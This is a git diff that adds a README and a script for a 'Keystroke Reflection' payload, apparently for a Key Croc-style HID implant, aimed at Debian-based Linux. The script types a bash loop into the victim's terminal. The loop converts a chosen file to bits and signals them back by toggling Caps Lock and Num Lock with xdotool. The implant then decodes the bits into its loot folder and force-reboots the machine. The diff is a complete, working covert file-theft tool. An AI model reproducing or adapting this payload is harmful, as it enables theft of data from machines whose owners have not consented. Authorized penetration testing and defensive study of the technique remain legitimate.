diff --git a/payloads/library/exfiltration/lin_keystroke-reflection/README.md b/payloads/library/exfiltration/lin_keystroke-reflection/README.md
new file mode 100644
index 0000000..5a50fe3
--- /dev/null
+++ b/payloads/library/exfiltration/lin_keystroke-reflection/README.md
@@ -0,0 +1,59 @@
+# "Linux" Keystroke Reflection
+
+- Title: "Linux" Keystroke Reflection
+- Author: TW-D
+- Version: 1.0
+- Target: Debian-Based Linux Distributions
+- Category: Exfiltration
+- Attackmode: HID
+
+## Description
+
+Implementation of the "Keystroke Reflection" technique for file exfiltration.
+
+The table below presents an estimation of the time taken for a specific number of bytes :
+
+| Bytes | Seconds (xdotool) |
+| --- | --- |
+| 5 | Between 10 and 15 |
+| 10 | Between 20 and 25 |
+| 100 | Between 220 and 230 |
+| 1000 | Between 2250 and 2260 |
+
+__Note :__ *The target system must have "xxd" and "xdotool" installed.*
+
+## Configuration
+
+From the file "keystroke-reflection_exfiltration.txt" change the value of the following variable :
+```
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+```
+
+## Trigger
+
+>
+> MATCH __kr:file=(.*?)\[ENTER\]
+>
+
+## Usage
+
+The triggering must be done in a terminal.
+
+```
+:~$ hostname > /tmp/EXFIL
+:~$ __kr:file=/tmp/EXFIL[ENTER]
+```
+
+**OR**
+
+```
+:~$ __kr:file=/etc/hostname[ENTER]
+```
+
+__Note :__ *After triggering, avoid using the keyboard.*
diff --git a/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt b/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt
new file mode 100644
index 0000000..2713a22
--- /dev/null
+++ b/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt
@@ -0,0 +1,119 @@
+#!/bin/bash
+#
+# Title: "Linux" Keystroke Reflection
+# Description:
+# Implementation of the
+# "Keystroke Reflection" technique
+# for file exfiltration.
+#
+# Author: TW-D
+# Version: 1.0
+# Target: Debian-Based Linux Distributions
+# Category: Exfiltration
+# Attackmode: HID
+#
+# TESTED ON
+# ===============
+# Ubuntu 22.04.3 LTS with "Logitech Keyboard K120"
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## TRIGGER ########
+
+MATCH __kr:file=(.*?)\[ENTER\]
+
+######## INITIALIZATION ########
+
+readonly KR_FILE="$(echo "${LOOT}" | sed 's/\[[^]]*\]//g')"
+readonly KR_BIN="/tmp/keystroke-reflection.bin"
+readonly KEYCROC_LOOT="/root/loot/keystroke-reflection_$(date '+%s')-${RANDOM}"
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+######## ATTACK ########
+
+LED ATTACK
+
+QUACK STRING " binary_dump=\"\$(xxd -b ${KR_FILE} | cut -d' ' -f2-7)\";"
+QUACK STRING " key_sequence=\"\";"
+QUACK STRING " for ((i=0;i<\"\${#binary_dump}\";i++)); do"
+QUACK STRING " if [ \"\${binary_dump:\$i:1}\" == \"0\" ]; then"
+QUACK STRING " key_sequence+=\"Caps_Lock \";"
+QUACK STRING " elif [ \"\${binary_dump:\$i:1}\" == \"1\" ]; then"
+QUACK STRING " key_sequence+=\"Num_Lock \";"
+QUACK STRING " fi;"
+QUACK STRING " done;"
+QUACK STRING " sleep 3;"
+QUACK STRING " xdotool key --delay 275 \$key_sequence"
+QUACK DELAY 250
+QUACK ENTER
+
+######## STAGE2 ########
+
+LED STAGE2
+
+loop_control="true"
+capslock_state="$(CAPSLOCK_ON)"
+numlock_state="$(NUMLOCK_ON)"
+
+while [ "${loop_control}" == "true" ]; do
+ start_time="$(date '+%s')"
+ while true; do
+ if [ "$(CAPSLOCK_ON)" != "${capslock_state}" ]; then
+ echo -n "0" >> "${KR_BIN}"
+ capslock_state="$(CAPSLOCK_ON)"
+ break
+ elif [ "$(NUMLOCK_ON)" != "${numlock_state}" ]; then
+ echo -n "1" >> "${KR_BIN}"
+ numlock_state="$(NUMLOCK_ON)"
+ break
+ elif [ $(($(date '+%s') - start_time)) -ge 9 ]; then
+ loop_control="false"
+ break
+ fi
+ done
+done
+
+######## STAGE3 ########
+
+LED STAGE3
+
+if [ -f "${KR_BIN}" ]; then
+ for binary in $(cat "${KR_BIN}" | sed 's/\(.\{8\}\)/\1 /g'); do
+ decimal="$((2#${binary}))"
+ hexadecimal="$(printf "%X" "${decimal}")"
+ ascii="$(printf "\\x${hexadecimal}")"
+ echo -en "${ascii}" >> "${KEYCROC_LOOT}"
+ done
+ rm "${KR_BIN}"
+fi
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+ATTACKMODE OFF
+
+######## OFF ########
+
+LED OFF
+
+reboot --force